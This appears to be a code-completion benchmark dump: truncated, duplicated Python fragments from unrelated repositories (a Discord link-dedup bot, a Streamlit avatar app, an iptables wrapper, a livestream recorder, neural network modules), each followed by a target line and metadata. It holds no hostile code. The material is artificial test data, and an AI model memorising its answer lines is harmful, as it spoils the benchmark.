if message.channel.id in auto_thread_channels and any(
str(role) in message.content for role in auto_thread_roles
):
await message.create_thread(
name="Auto-Thread - Please keep discussions in here!",
reason="Auto thread created by FMHY Bot")
if message.author.bot:
return
if message.channel.id in channel_ids:
message_links = set(re.findall(url_regex, message.content))
if message_links:
(
duplicate_links,
non_duplicate_links,
) = await self.get_duplicate_non_duplicate_links(message_links)
# One link, duplicate
if len(message_links) == 1 and len(duplicate_links) == 1:
reply_message = await message.reply("**This link is already in the wiki!**")
await reply_message.add_reaction("❌")
return
# All links, duplicates
elif len(message_links) > 1 and len(message_links) == len(duplicate_links):
reply_message = await message.reply(
"**All of these links are already in the wiki!**"
)
await reply_message.add_reaction("❌")
return
# Partial duplicates
elif len(message_links) > 1 and len(duplicate_links) >= 1:
non_duplicate_links_string = "\n".join(
[f"{protocol}://{link}" for protocol,
link in non_duplicate_links]
)
non_duplicate_links_embed = cembed(
title="__Non-Duplicate Links:__",
description=f"{non_duplicate_links_string}",
)
non_duplicate_links_embed.set_author(
name=message.author.name,
icon_url=message.author.display_avatar,
)
reply_message = await message.reply(embed=non_duplicate_links_embed)
await reply_message.add_reaction("❌")
return
@commands.Cog.listener()
async def on_raw_reaction_add(self, payload):
emoji = payload.emoji
chan_id = payload.channel_id
msg_id = payload.message_id
channel = await self.bot.fetch_channel(chan_id)
msg: discord.Message = await channel.fetch_message(msg_id)
user = await self.bot.fetch_user(payload.user_id)
if not isinstance(channel, discord.DMChannel):
# Bookmark message
if emoji == self.bookmark_emoji:
attachments = msg.attachments
embed = discord.Embed(color=0x2B2D31, timestamp=datetime.now())
embed.set_author(name=msg.author.name,
icon_url=msg.author.display_avatar)
embed.description = msg.content[:4096]
embed.add_field(
name="Jump", value=f"[Go to Message!]({msg.jump_url})")
embed.set_footer(
text=f"Guild: {channel.guild.name} | Channel: #{channel.name}")
attach = ""
if attachments:
img_added = False
for attachment in attachments:
if img_added is False:
if attachment.content_type in [
"image/avif",
"image/jpeg",
"image/png",
]:
try:
embed.set_image(url=attachment.url)
except:
pass
img_added = True
attach += f"{attachment.url}\n"
try:
sent = await user.send(content=f"\n{attach}", embed=embed)
await sent.add_reaction("❌")
except discord.Forbidden:
await channel.send(
f"**{user.mention} I do not have permission to DM you. Please enable DMs for this server.**"
)
# Delete message if user has roles that can manage messages
if (
emoji == self.del_emoji
and msg.author.id == self.bot.user.id
and payload.user_id != self.bot.user.id
):
for role in payload.member.roles:
|
class EventHandling(commands.Cog):
"""EventHandling commands"""
def __init__(self, bot: Bot):
self.bot = bot
self.bookmark_emoji = discord.PartialEmoji(name="🔖")
self.del_emoji = discord.PartialEmoji(name="❌")
self.last_single_page_update = 0
self.single_page = ""
self.dead_sites_messages = set()
self.deleted_sites_messages = set()
@tasks.loop(minutes=5)
async def update_single_page(self):
async with self.bot.session.get(
"https://raw.githubusercontent.com/fmhy/FMHYedit/main/single-page"
) as response:
self.single_page = await response.text()
async def cog_before_invoke(self, ctx):
"""Triggers typing indicator on Discord before every command."""
await ctx.channel.typing()
return
async def get_duplicate_non_duplicate_links(self, message_links):
if time.time() - self.last_single_page_update >= 300:
await self.update_single_page()
wiki_links = set(
re.findall(
url_regex,
self.single_page,
)
)
duplicate_links = wiki_links.intersection(message_links)
non_duplicate_links = message_links - duplicate_links
return duplicate_links, non_duplicate_links
@commands.Cog.listener()
async def on_ready(self):
self.update_single_page.start()
dead_sites_channel = self.bot.get_channel(988133247575810059)
if dead_sites_channel:
self.dead_sites_messages = set(await dead_sites_channel.history(limit=None).flatten())
deleted_sites_channel = self.bot.get_channel(986617857133649921)
if deleted_sites_channel:
self.deleted_sites_messages = set(
await deleted_sites_channel.history(limit=None).flatten()
)
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.channel.id in auto_thread_channels and any(
str(role) in message.content for role in auto_thread_roles
):
await message.create_thread(
name="Auto-Thread - Please keep discussions in here!",
reason="Auto thread created by FMHY Bot")
if message.author.bot:
return
if message.channel.id in channel_ids:
message_links = set(re.findall(url_regex, message.content))
if message_links:
(
duplicate_links,
non_duplicate_links,
) = await self.get_duplicate_non_duplicate_links(message_links)
# One link, duplicate
if len(message_links) == 1 and len(duplicate_links) == 1:
reply_message = await message.reply("**This link is already in the wiki!**")
await reply_message.add_reaction("❌")
return
# All links, duplicates
elif len(message_links) > 1 and len(message_links) == len(duplicate_links):
reply_message = await message.reply(
"**All of these links are already in the wiki!**"
)
await reply_message.add_reaction("❌")
return
# Partial duplicates
elif len(message_links) > 1 and len(duplicate_links) >= 1:
non_duplicate_links_string = "\n".join(
[f"{protocol}://{link}" for protocol,
link in non_duplicate_links]
)
non_duplicate_links_embed = cembed(
title="__Non-Duplicate Links:__",
description=f"{non_duplicate_links_string}",
)
non_duplicate_links_embed.set_author(
name=message.author.name,
icon_url=message.author.display_avatar,
)
reply_message = await message.reply(embed=non_duplicate_links_embed)
await reply_message.add_reaction("❌")
return
@commands.Cog.listener()
async def on_raw_reaction_add(self, payload):
emoji = payload.emoji
chan_id = payload.channel_id
msg_id = payload.message_id
channel = await self.bot.fetch_channel(chan_id)
msg: discord.Message = await channel.fetch_message(msg_id)
user = await self.bot.fetch_user(payload.user_id)
if not isinstance(channel, discord.DMChannel):
# Bookmark message
if emoji == self.bookmark_emoji:
attachments = msg.attachments
embed = discord.Embed(color=0x2B2D31, timestamp=datetime.now())
embed.set_author(name=msg.author.name,
icon_url=msg.author.display_avatar)
embed.description = msg.content[:4096]
embed.add_field(
name="Jump", value=f"[Go to Message!]({msg.jump_url})")
embed.set_footer(
text=f"Guild: {channel.guild.name} | Channel: #{channel.name}")
attach = ""
if attachments:
img_added = False
for attachment in attachments:
if img_added is False:
if attachment.content_type in [
"image/avif",
"image/jpeg",
"image/png",
]:
try:
embed.set_image(url=attachment.url)
except:
pass
img_added = True
attach += f"{attachment.url}\n"
try:
sent = await user.send(content=f"\n{attach}", embed=embed)
await sent.add_reaction("❌")
except discord.Forbidden:
await channel.send(
f"**{user.mention} I do not have permission to DM you. Please enable DMs for this server.**"
)
# Delete message if user has roles that can manage messages
if (
emoji == self.del_emoji
and msg.author.id == self.bot.user.id
and payload.user_id != self.bot.user.id
):
for role in payload.member.roles: | if role.id in managing_roles: | 0 | 2023-12-19 10:27:04+00:00 | 4k |
morikeli/persona | main.py | [
{
"identifier": "facial_expression",
"path": "features/person/faces/expressions/facial_expression.py",
"snippet": "FACIAL_EXPRESSIONS = [\n 'DEFAULT',\n 'ANGRY',\n 'ANGRY_NATURAL',\n 'DEFAULT_NATURAL',\n 'FLAT_NATURAL',\n 'FROWN_NATURAL',\n 'RAISED_EXCITED',\n 'RAISED_EXCITED_NAT... | from features.person.faces.expressions import facial_expression as fe
from features.fashion.accessories import add_ons
from features.fashion.clothing import clothes, hats
from features.fashion.hairstyles import beard, hair
from features.person.complexion import skins
from features.person.faces import face
from avatar.avatar import random_avatar, custom_avatar
from animations.utils import christmas_festive_animation
from images.image import download_avatar
import streamlit as st | 3,132 |
# webpage configuration
st.set_page_config(page_title='Persona', page_icon=':busts_in_silhouette:', layout='centered')
with open('static/css/styles.css') as stylesheet:
st.markdown(f'<style>{stylesheet.read()}</style>', unsafe_allow_html=True)
def main(features_indices: dict = None):
""" This is the main function that uses streamlit to create a dynamic web page. """
# navigation tabs
tabs = st.tabs(['Beard & Hair', 'Facial features', 'Fashion trends', 'Color', 'Background style'])
st.divider()
# "Generate random avatar" & "Download button" buttons column
cols_btn = st.columns([6, 6])
with cols_btn[1]:
download_btn = download_avatar()
if download_btn: # display download button by default
# download_avatar()
st.balloons()
if cols_btn[0].button('Generate random avatar', use_container_width=True):
features_indices = random_avatar()
with tabs[0]:
st.caption('Add beard, hairstyle or hair cut')
avatar_hair = st.selectbox(
label=':haircut: Hair',
options=hair.HAIR_STYLES,
index=features_indices["hair"] if features_indices else 0,
)
avatar_beard = st.selectbox(
label=':bearded_person: Beard',
options=beard.BEARD,
index=features_indices["beard"] if features_indices else 0,
)
with tabs[1]:
st.caption('Add eyes or facial expression.')
avatar_eyes = st.selectbox(
label=':eyes: Eyes',
options=face.EYES,
index=features_indices["eyes"] if features_indices else 0,
)
avatar_facial_expr = st.selectbox(
label=':smiley: Facial expression',
options=fe.FACIAL_EXPRESSIONS,
index=features_indices["face_expression"] if features_indices else 0,
)
avatar_mouth = st.selectbox(
label=':lips: Mouth',
options=fe.FACIAL_EXPRESSIONS_MOUTH,
index=features_indices["mouth"] if features_indices else 0,
)
with tabs[2]:
st.caption("What are your favorite fashion trends?")
tabs_cols = st.columns([6, 6])
avatar_addons = tabs_cols[0].selectbox(
label=':sunglasses: Accessories',
options=add_ons.FASHION_ACCESSORIES,
index=features_indices["accessories"] if features_indices else 0,
)
avatar_clothe = tabs_cols[0].selectbox(
label=':tshirt: Clothes',
|
# webpage configuration
st.set_page_config(page_title='Persona', page_icon=':busts_in_silhouette:', layout='centered')
with open('static/css/styles.css') as stylesheet:
st.markdown(f'<style>{stylesheet.read()}</style>', unsafe_allow_html=True)
def main(features_indices: dict = None):
""" This is the main function that uses streamlit to create a dynamic web page. """
# navigation tabs
tabs = st.tabs(['Beard & Hair', 'Facial features', 'Fashion trends', 'Color', 'Background style'])
st.divider()
# "Generate random avatar" & "Download button" buttons column
cols_btn = st.columns([6, 6])
with cols_btn[1]:
download_btn = download_avatar()
if download_btn: # display download button by default
# download_avatar()
st.balloons()
if cols_btn[0].button('Generate random avatar', use_container_width=True):
features_indices = random_avatar()
with tabs[0]:
st.caption('Add beard, hairstyle or hair cut')
avatar_hair = st.selectbox(
label=':haircut: Hair',
options=hair.HAIR_STYLES,
index=features_indices["hair"] if features_indices else 0,
)
avatar_beard = st.selectbox(
label=':bearded_person: Beard',
options=beard.BEARD,
index=features_indices["beard"] if features_indices else 0,
)
with tabs[1]:
st.caption('Add eyes or facial expression.')
avatar_eyes = st.selectbox(
label=':eyes: Eyes',
options=face.EYES,
index=features_indices["eyes"] if features_indices else 0,
)
avatar_facial_expr = st.selectbox(
label=':smiley: Facial expression',
options=fe.FACIAL_EXPRESSIONS,
index=features_indices["face_expression"] if features_indices else 0,
)
avatar_mouth = st.selectbox(
label=':lips: Mouth',
options=fe.FACIAL_EXPRESSIONS_MOUTH,
index=features_indices["mouth"] if features_indices else 0,
)
with tabs[2]:
st.caption("What are your favorite fashion trends?")
tabs_cols = st.columns([6, 6])
avatar_addons = tabs_cols[0].selectbox(
label=':sunglasses: Accessories',
options=add_ons.FASHION_ACCESSORIES,
index=features_indices["accessories"] if features_indices else 0,
)
avatar_clothe = tabs_cols[0].selectbox(
label=':tshirt: Clothes', | options=clothes.CLOTHES_CATEGORIES, | 2 | 2023-12-19 09:39:04+00:00 | 4k |
JonatanNevo/better-iptables | iptables/iptables.py | [
{
"identifier": "ConnbytesDirection",
"path": "iptables/enums.py",
"snippet": "class ConnbytesDirection(str, Enum):\n ORIGINAL = \"original\"\n REPLY = \"reply\"\n BOTH = \"both\""
},
{
"identifier": "ConnbytesMode",
"path": "iptables/enums.py",
"snippet": "class ConnbytesMode(s... | import dataclasses
import re
from enum import Enum
from typing import Optional, Union, List, Tuple
from typing_extensions import Self
from iptables.enums import ConnbytesDirection, ConnbytesMode, ConntrackStates, ConntrackStatus, ConntrackDirection, \
LimitUnits, State, TcpFlags, Targets, Protocols, Tables, Chains, Actions, RejectType
from iptables.exceptions import IPTablesError, IPVersionError, ConnbytesError, ConnlimitAddrError, \
MultiportSourceAndDestinationError, MultiportPortsAndOtherError, MultiportFormatError | 2,105 |
@dataclasses.dataclass(frozen=True)
class Module:
module: str
parameters: List[Tuple[str, str]] = dataclasses.field(default_factory=list)
def build(self) -> str:
parameters = []
for argument, value in self.parameters:
if value:
parameters.append(f"--{argument} {value}")
else:
parameters.append(f"--{argument}")
return f"-m {self.module} {' '.join(parameters)}"
@dataclasses.dataclass(frozen=True)
class Flags:
ipv4: bool = True
ipv6: bool = False
fragment: bool = False
lock: bool = False # same as --wait
verbose: bool = False
resolve: bool = True # same as --numeric
exact: bool = False
def __post_init__(self) -> None:
if self.ipv4 and self.ipv6:
raise IPVersionError
def build(self) -> str:
flags = []
if self.fragment:
flags.append("-f")
if self.ipv4:
flags.append("-4")
elif self.ipv6:
flags.append("-6")
if self.lock:
flags.append("-w")
if self.verbose:
flags.append("-v")
if not self.resolve:
flags.append("-n")
if self.exact:
flags.append("-x")
return " ".join(flags)
def __str__(self) -> str:
return self.build()
@dataclasses.dataclass(frozen=True)
class Matches:
# TODO: add set-counters
|
@dataclasses.dataclass(frozen=True)
class Module:
module: str
parameters: List[Tuple[str, str]] = dataclasses.field(default_factory=list)
def build(self) -> str:
parameters = []
for argument, value in self.parameters:
if value:
parameters.append(f"--{argument} {value}")
else:
parameters.append(f"--{argument}")
return f"-m {self.module} {' '.join(parameters)}"
@dataclasses.dataclass(frozen=True)
class Flags:
ipv4: bool = True
ipv6: bool = False
fragment: bool = False
lock: bool = False # same as --wait
verbose: bool = False
resolve: bool = True # same as --numeric
exact: bool = False
def __post_init__(self) -> None:
if self.ipv4 and self.ipv6:
raise IPVersionError
def build(self) -> str:
flags = []
if self.fragment:
flags.append("-f")
if self.ipv4:
flags.append("-4")
elif self.ipv6:
flags.append("-6")
if self.lock:
flags.append("-w")
if self.verbose:
flags.append("-v")
if not self.resolve:
flags.append("-n")
if self.exact:
flags.append("-x")
return " ".join(flags)
def __str__(self) -> str:
return self.build()
@dataclasses.dataclass(frozen=True)
class Matches:
# TODO: add set-counters | protocol: Optional[Protocols] = None | 9 | 2023-12-17 17:00:49+00:00 | 4k |
cvlab-yonsei/RankMixup | tools/test_net.py | [
{
"identifier": "Tester",
"path": "calibrate/engine/tester.py",
"snippet": "class Tester:\n def __init__(self, cfg: DictConfig) -> None:\n self.cfg = cfg\n self.work_dir = self.cfg.work_dir\n self.device = torch.device(self.cfg.device)\n self.build_data_loader()\n s... | import os
import sys
import logging
import hydra
from omegaconf import DictConfig, OmegaConf
from omegaconf.omegaconf import open_dict
from calibrate.engine import Tester, OODTester
from calibrate.utils import set_random_seed | 2,678 |
logger = logging.getLogger(__name__)
TESTER = {
"cv": Tester,
|
logger = logging.getLogger(__name__)
TESTER = {
"cv": Tester, | "ood": OODTester, | 1 | 2023-12-17 13:53:18+00:00 | 4k |
CaptainCook4D/downloader | download_hololens_data.py | [
{
"identifier": "prepare_hololens_2d_output_directory",
"path": "util.py",
"snippet": "def prepare_hololens_2d_output_directory(args, output_dir: Path):\n\toutput_dir.mkdir(parents=True, exist_ok=True)\n\t\n\tdata_directory = output_dir / Constants.CAPTAIN_COOK_4D\n\tdata_directory.mkdir(parents=True, e... | import argparse
import json
from pathlib import Path
from util import prepare_hololens_2d_output_directory, Constants, download_data | 1,659 |
# Please note that not all videos are recorded with hololens.
# Roughly, 60 videos are recorded only with GoPro, and they do not have hololens components.
# Due to device instability, roughly additional 40 videos don't have spatial data that includes Pose, 3D Hand Data
def process_download_hololens_data(download_args):
# ---- Parse Download Links Json ----
with open("metadata/download_links.json", "r") as f:
download_links = json.load(f)
output_dir = Path(download_args.output_dir)
data_directory = prepare_hololens_2d_output_directory(download_args, output_dir)
download_url_links = []
download_file_paths = []
for index, (recording_id, recording_download_link_dict) in enumerate(download_links.items()):
if download_args.data2d:
|
# Please note that not all videos are recorded with hololens.
# Roughly, 60 videos are recorded only with GoPro, and they do not have hololens components.
# Due to device instability, roughly additional 40 videos don't have spatial data that includes Pose, 3D Hand Data
def process_download_hololens_data(download_args):
# ---- Parse Download Links Json ----
with open("metadata/download_links.json", "r") as f:
download_links = json.load(f)
output_dir = Path(download_args.output_dir)
data_directory = prepare_hololens_2d_output_directory(download_args, output_dir)
download_url_links = []
download_file_paths = []
for index, (recording_id, recording_download_link_dict) in enumerate(download_links.items()):
if download_args.data2d: | if Constants.HOLOLENS_SYNC_PV_VIDEO in recording_download_link_dict: | 1 | 2023-12-16 00:27:29+00:00 | 4k |
mjavadpur/Sadtalker_LongVideos | src/facerender/modules/generator.py | [
{
"identifier": "ResBlock2d",
"path": "src/facerender/modules/util.py",
"snippet": "class ResBlock2d(nn.Module):\n \"\"\"\n Res block, preserve spatial resolution.\n \"\"\"\n\n def __init__(self, in_features, kernel_size, padding):\n super(ResBlock2d, self).__init__()\n self.co... | import torch
import torch.nn.functional as F
from torch import nn
from src.facerender.modules.util import ResBlock2d, SameBlock2d, UpBlock2d, DownBlock2d, ResBlock3d, SPADEResnetBlock
from src.facerender.modules.dense_motion import DenseMotionNetwork | 3,532 |
class OcclusionAwareGenerator(nn.Module):
"""
Generator follows NVIDIA architecture.
"""
def __init__(self, image_channel, feature_channel, num_kp, block_expansion, max_features, num_down_blocks, reshape_channel, reshape_depth,
num_resblocks, estimate_occlusion_map=False, dense_motion_params=None, estimate_jacobian=False):
super(OcclusionAwareGenerator, self).__init__()
if dense_motion_params is not None:
self.dense_motion_network = DenseMotionNetwork(num_kp=num_kp, feature_channel=feature_channel,
estimate_occlusion_map=estimate_occlusion_map,
**dense_motion_params)
else:
self.dense_motion_network = None
self.first = SameBlock2d(image_channel, block_expansion, kernel_size=(7, 7), padding=(3, 3))
down_blocks = []
for i in range(num_down_blocks):
in_features = min(max_features, block_expansion * (2 ** i))
out_features = min(max_features, block_expansion * (2 ** (i + 1)))
|
class OcclusionAwareGenerator(nn.Module):
"""
Generator follows NVIDIA architecture.
"""
def __init__(self, image_channel, feature_channel, num_kp, block_expansion, max_features, num_down_blocks, reshape_channel, reshape_depth,
num_resblocks, estimate_occlusion_map=False, dense_motion_params=None, estimate_jacobian=False):
super(OcclusionAwareGenerator, self).__init__()
if dense_motion_params is not None:
self.dense_motion_network = DenseMotionNetwork(num_kp=num_kp, feature_channel=feature_channel,
estimate_occlusion_map=estimate_occlusion_map,
**dense_motion_params)
else:
self.dense_motion_network = None
self.first = SameBlock2d(image_channel, block_expansion, kernel_size=(7, 7), padding=(3, 3))
down_blocks = []
for i in range(num_down_blocks):
in_features = min(max_features, block_expansion * (2 ** i))
out_features = min(max_features, block_expansion * (2 ** (i + 1))) | down_blocks.append(DownBlock2d(in_features, out_features, kernel_size=(3, 3), padding=(1, 1))) | 3 | 2023-12-19 11:01:35+00:00 | 4k |
Westlake-geeks/bilibili-livestream-slicer | main.py | [
{
"identifier": "is_live",
"path": "api.py",
"snippet": "def is_live(uid):\n live_api = \"https://api.live.bilibili.com/room/v1/Room/room_init?id=%s\" % str(\n uid)\n rtn = my_request(live_api)\n data_dict = json.loads(rtn)\n\n data_value = data_dict.get('data')\n live_status_value... | import os
import json
import traceback
import sys
import re
import streamlink
import threading
import requests
import time
import datetime
import urllib
import socket
from api import is_live, get_stream_url, get_name, my_request
from urllib import request
| 3,539 |
socket.setdefaulttimeout(5.0)
def record(real_url, file_name, headers):
if not real_url:
return
res = None
try:
with urllib.request.urlopen(urllib.request.Request(real_url, headers=headers)) as response:
size = 0
with open(file_name, 'wb') as f:
print('starting download from:\n%s\nto:\n%s' %
(real_url, file_name))
chunk_size = 64*1024
while True:
chunk = response.read(chunk_size)
if not chunk:
print('连接中断')
break
f.write(chunk)
#size += len(chunk)
#print('{:<4.2f} MB downloaded'.format(
# size/1024/1024), datetime.datetime.now(), end="\r")
except Exception as e:
print("=============================")
print(e)
print("=============================")
finally:
print("finnally")
if res:
res.close()
print("res.close()")
if os.path.isfile(file_name) and os.path.getsize(file_name) == 0:
os.remove(file_name)
print("os.remove(file_name)")
def __main__(id,filename):
#conf = json.load(open("_config.json"))
_id = id
|
socket.setdefaulttimeout(5.0)
def record(real_url, file_name, headers):
if not real_url:
return
res = None
try:
with urllib.request.urlopen(urllib.request.Request(real_url, headers=headers)) as response:
size = 0
with open(file_name, 'wb') as f:
print('starting download from:\n%s\nto:\n%s' %
(real_url, file_name))
chunk_size = 64*1024
while True:
chunk = response.read(chunk_size)
if not chunk:
print('连接中断')
break
f.write(chunk)
#size += len(chunk)
#print('{:<4.2f} MB downloaded'.format(
# size/1024/1024), datetime.datetime.now(), end="\r")
except Exception as e:
print("=============================")
print(e)
print("=============================")
finally:
print("finnally")
if res:
res.close()
print("res.close()")
if os.path.isfile(file_name) and os.path.getsize(file_name) == 0:
os.remove(file_name)
print("os.remove(file_name)")
def __main__(id,filename):
#conf = json.load(open("_config.json"))
_id = id
| _name = get_name(int(_id))
| 2 | 2023-12-16 17:08:02+00:00 | 4k |
Angryrou/udao | udao/model/tests/embedders/test_base_graph_embedder.py | [
{
"identifier": "BaseGraphEmbedder",
"path": "udao/model/embedders/base_graph_embedder.py",
"snippet": "class BaseGraphEmbedder(BaseEmbedder, ABC):\n \"\"\"Base class for Embedder networks.\n Takes care of preparing the input features for the\n embedding layer, and normalizing the output embedd... | import pytest
import torch as th
from ...embedders.base_graph_embedder import BaseGraphEmbedder
from .conftest import generate_dgl_graph | 1,607 |
def test_base_embedder_initialization() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="BN",
n_op_types=3,
)
embedder = BaseGraphEmbedder(params)
assert embedder.input_size == 10
assert embedder.embedding_size == 10
assert embedder.op_type
assert embedder.op_cbo
assert not embedder.op_enc
def test_base_embedder_invalid_normalizer() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="UNKNOWN", # type: ignore
n_op_types=3,
)
with pytest.raises(ValueError):
BaseGraphEmbedder(params)
def test_base_embedder_concatenate_op_features() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer=None,
n_op_types=3,
)
embedder = BaseGraphEmbedder(params)
|
def test_base_embedder_initialization() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="BN",
n_op_types=3,
)
embedder = BaseGraphEmbedder(params)
assert embedder.input_size == 10
assert embedder.embedding_size == 10
assert embedder.op_type
assert embedder.op_cbo
assert not embedder.op_enc
def test_base_embedder_invalid_normalizer() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="UNKNOWN", # type: ignore
n_op_types=3,
)
with pytest.raises(ValueError):
BaseGraphEmbedder(params)
def test_base_embedder_concatenate_op_features() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer=None,
n_op_types=3,
)
embedder = BaseGraphEmbedder(params) | g = generate_dgl_graph( | 1 | 2023-12-20 09:10:42+00:00 | 4k |
SnailForce/SIM-Net | models/texture_model/heatmap_detector.py | [
{
"identifier": "Hourglass",
"path": "models/spatial_model/util.py",
"snippet": "class Hourglass(nn.Module):\n \"\"\"\n Hourglass architecture.\n \"\"\"\n\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\n super(Hourglass, self).__init__()\n s... | from numpy.core.fromnumeric import mean
from torch import nn
from ..spatial_model.util import Hourglass, make_coordinate_grid, AntiAliasInterpolation2d,kp2gaussian
import torch
import torch.nn.functional as F
import numpy as np | 3,295 | ycbcr_image = torch.where(ycbcr_image < 0.06275,torch.ones_like(ycbcr_image) * 0.06275,ycbcr_image)
bs,c,h,w = ycbcr_image.shape
ycbcr_image = ycbcr_image.view(bs,c,-1)
transform_matrix = self.transform_matrix_inv.type(ycbcr_image.type())
shift_matrix = self.shift_matrix_inv.type(ycbcr_image.type())
rgb_image = torch.matmul(transform_matrix.unsqueeze(0),ycbcr_image) - shift_matrix.unsqueeze(0).unsqueeze(-1)
rgb_image = torch.where(rgb_image > 1,torch.ones_like(rgb_image),rgb_image)
rgb_image = torch.where(rgb_image < 0,torch.zeros_like(rgb_image),rgb_image)
return rgb_image.reshape(bs,c,h,w)
def rgb2lab(self,rgb_image):
transform_matrix = torch.tensor([[0.3811, 0.5783, 0.0402],
[0.1967, 0.7244, 0.0782],
[0.0241, 0.1288, 0.8444]])
transform_matrix = transform_matrix.type(rgb_image.type())
bs,c,h,w = rgb_image.shape
rgb_image = rgb_image.view(bs,c,-1)
lab_image = torch.matmul(transform_matrix.unsqueeze(0),rgb_image)
lab_image = torch.log(lab_image)
matrix_1 = torch.tensor([[1 / np.sqrt(3),0,0],
[0,1 / np.sqrt(6),0],
[0,0,1/np.sqrt(2)]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-2],
[1,-1,0]])
matrix = torch.matmul(matrix_1,matrix_2)
matrix = matrix.type(rgb_image.type())
return torch.matmul(matrix.unsqueeze(0),lab_image).reshape(bs,c,h,w)
def lab2rgb(self,lab_image):
transform_matrix = torch.tensor([[4.4679 ,3.5873 ,0.1193],
[-1.2186, 2.3809, 0.1624],
[0.0497, 0.2439, 1.2045]])
transform_matrix = transform_matrix.type(lab_image.type())
matrix_1 = torch.tensor([[ np.sqrt(3) / 3,0,0],
[0,np.sqrt(6) / 6,0],
[0,0,np.sqrt(2) / 2]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-1],
[1,-2,0]])
matrix = torch.matmul(matrix_2,matrix_1)
matrix = matrix.type(lab_image.type())
bs,c,h,w = lab_image.shape
lab_image = lab_image.view(bs,c,-1)
rgb_image= torch.matmul(matrix.unsqueeze(0),lab_image)
rgb_image = torch.pow(10,rgb_image)
return torch.matmul(transform_matrix.unsqueeze(0),rgb_image).reshape(bs,c,h,w)
def weighted_mean(self,values,weighted,dim=-1):
return torch.sum(values * weighted,dim) / (torch.sum(weighted,dim) + 1e-8)
def weighted_mean_std(self,values,weighted,dim=-1):
mean = self.weighted_mean(values,weighted)
return mean,torch.sqrt(self.weighted_mean((values - mean.unsqueeze(-1))**2,weighted,dim) + 1e-8)
def create_code(self,source_image,source_heatmaps):
bs, c, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).repeat(1, self.num_kp, 1, 1,1)
source_repeat_flatten = source_repeat.view((bs,self.num_kp,c,-1))
source_heatmaps_flatten = source_heatmaps.view((bs,self.num_kp,1,-1))
source_mean,source_std = self.weighted_mean_std(source_repeat_flatten,source_heatmaps_flatten)
source_std = source_std.unsqueeze(-1).unsqueeze(-1) + 1e-8
source_mean = source_mean.unsqueeze(-1).unsqueeze(-1)
source_image_code = (source_repeat - source_mean) / source_std
return source_image_code,source_mean,source_std
def create_transformed_source_image(self, source_image, target_image, source_heatmaps,target_heatmaps,common_heaatmaps):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
bs, c, h, w = source_image.shape
source_image = source_image.clone()
source_image[:,:3] = self.rgb2ycbcr(source_image[:,:3])
target_image = target_image.clone()
target_image[:,:3] = self.rgb2ycbcr(target_image[:,:3])
source_image_code,_,_ = self.create_code(source_image,source_heatmaps)
target_image_code,target_mean,target_std = self.create_code(target_image,target_heatmaps)
target_image_code = self.create_deformed_source_image(target_image_code,self.sparse_motion)
source_weight = self.weight * 1000
target_weight = (1 - self.weight) * 1000
transformed_image_code = target_image_code.clone()
transformed_image_code[:,:,0]= (source_image_code[:,:,0] * source_weight + target_image_code[:,:,0] * target_weight) / (source_weight + target_weight + 1e-8)
transformed_image = transformed_image_code * target_std + target_mean
return transformed_image
def create_deformed_source_image(self, source_image, sparse_motions):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
if len(source_image.shape) == 5:
bs, _,_, h, w = source_image.shape
source_repeat = source_image.clone()
else:
bs, _, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).unsqueeze(1).repeat(1, self.num_kp + 1, 1, 1, 1, 1)
source_repeat = source_repeat.view(bs * (self.num_kp + 1), -1, h, w)
sparse_motions = sparse_motions.contiguous().view((bs * (self.num_kp + 1), h, w, -1))
sparse_deformed = F.grid_sample(source_repeat, sparse_motions, padding_mode = 'zeros')
sparse_deformed = sparse_deformed.view((bs, self.num_kp + 1 , -1, h, w))
return sparse_deformed
def create_sparse_motions(self, source_image, kp_driving, kp_source):
bs, _, h, w = source_image.shape
|
class DenseNetwork(nn.Module):
"""
Module that predicting a dense motion from sparse motion representation given by kp_source and kp_driving
"""
def __init__(self, block_expansion, num_blocks, max_features, num_kp, num_channels,
scale_factor=1, kp_variance=0.01):
super(DenseNetwork, self).__init__()
self.hourglass = Hourglass(block_expansion=block_expansion, in_features=(num_kp + 1) * (num_channels + 1),
max_features=max_features, num_blocks=num_blocks)
self.mask = nn.Conv2d(self.hourglass.out_filters, num_kp + 1, kernel_size=(7, 7), padding=(3, 3))
self.num_kp = num_kp
self.scale_factor = scale_factor
self.kp_variance = kp_variance
self.transform_matrix = torch.tensor([[0.257, 0.564, 0.098],
[-0.148, -0.291, 0.439],
[0.439, -0.368, -0.071]])
self.shift_matrix = torch.tensor([16.0, 128.0, 128.0]) / 255
self.shift_matrix.type(self.transform_matrix.type())
self.transform_matrix_inv = self.transform_matrix.inverse()
self.shift_matrix_inv = torch.matmul(self.transform_matrix_inv,self.shift_matrix)
if self.scale_factor != 1:
self.down = AntiAliasInterpolation2d(num_channels, self.scale_factor)
self.weight = 0.2
def create_heatmap_representations(self, spatial_size, kp):
heatmap = kp2gaussian(kp, spatial_size=spatial_size, kp_variance=self.kp_variance)
#adding background feature
zeros = torch.zeros(heatmap.shape[0], 1, spatial_size[0], spatial_size[1]).type(heatmap.type())
heatmap = torch.cat([zeros, heatmap], dim=1)
heatmap = heatmap.unsqueeze(2)
return heatmap
def rgb2ycbcr(self,rgb_image):
bs,c,h,w = rgb_image.shape
rgb_image = rgb_image.view(bs,c,-1)
transform_matrix = self.transform_matrix.type(rgb_image.type())
shift_matrix = self.shift_matrix.type(rgb_image.type())
